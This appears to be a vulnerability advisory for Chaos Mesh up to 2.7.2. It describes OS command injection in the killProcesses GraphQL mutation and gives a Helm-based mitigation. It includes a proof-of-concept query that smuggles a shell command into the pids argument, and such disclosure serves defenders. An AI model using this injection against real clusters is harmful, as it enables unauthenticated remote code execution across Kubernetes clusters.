OS command injection in Chaos Mesh via the killProcesses mutation
github.com/chaos-mesh/chaos-mesh
(,2.7.2]
The killProcesses mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.
{"query": "mutation KillProcessesInPod {
pod(ns: \"kube-system\", name: \"kube-proxy-9trk4\") {
killProcesses(pids: [\"1\","; touch /tmp/pwned;"]) {
pid command } } }
If upgrading Chaos-Mesh to the fixed version is not possible, re-deploy the Helm chart and disable the chaosctl tool and port:
helm install chaos-mesh chaos-mesh/chaos-mesh -n=chaos-mesh --version 2.7.x --set enableCtrlServer=false